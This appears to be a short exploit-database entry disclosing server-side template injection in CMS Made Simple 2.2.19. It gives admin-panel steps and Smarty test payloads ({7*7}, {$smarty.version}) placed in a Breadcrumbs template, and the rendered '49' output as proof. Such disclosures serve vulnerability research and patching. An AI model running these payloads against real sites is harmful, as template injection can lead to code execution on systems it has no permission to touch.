Share
## https://sploitus.com/exploit?id=PACKETSTORM:177244
# Exploit Title: CMS Made Simple Version: 2.2.19 - SSTI  
# Date: 2024-21-02  
# Exploit Author: tmrswrr  
# Vendor Homepage: https://www.cmsmadesimple.org/  
# Version: 2.2.19  
# Tested on: https://www.softaculous.com/demos/CMS_Made_Simple  
  
  
1 ) log in as admin and go to Layout > Design Manager > Breadcrumbs  
2 ) Click edit and write SSTI payload : {7*7} , {$smarty.version},{{7*7}}   
3 ) After click Apply > Submit  
4 ) Go to home page > https://127.0.0.1/CMS_Made_Simple/index.php?page=templates-and-stylesheets  
will be see : 49 class="breadcrumbs"